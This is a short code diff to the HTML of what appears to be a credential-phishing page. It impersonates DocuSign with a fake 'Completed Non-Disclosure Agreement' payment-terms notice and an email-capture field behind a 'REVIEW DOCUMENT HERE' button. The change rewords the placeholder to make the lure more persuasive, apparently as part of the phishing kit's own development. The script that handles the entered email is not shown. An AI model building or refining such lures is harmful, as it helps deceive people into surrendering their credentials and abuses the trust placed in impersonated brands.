--- a/index.html
+++ b/index.html
@@ -72,7 +72,7 @@
         <img src="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png" alt="Outlook Logo" class="logo"><br>
         
         <p>Approved: Completed Non-Disclosure Agreement & MOU Vendor#30862911 Payment_terms.pdf</p><br><br>
-        <input type="email" id="email" placeholder="Enter the recipient's email to proceed"> </br></br>
+        <input type="email" id="email" placeholder="Enter the recipient's email to view document"> </br></br>
         <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
     </div>
 
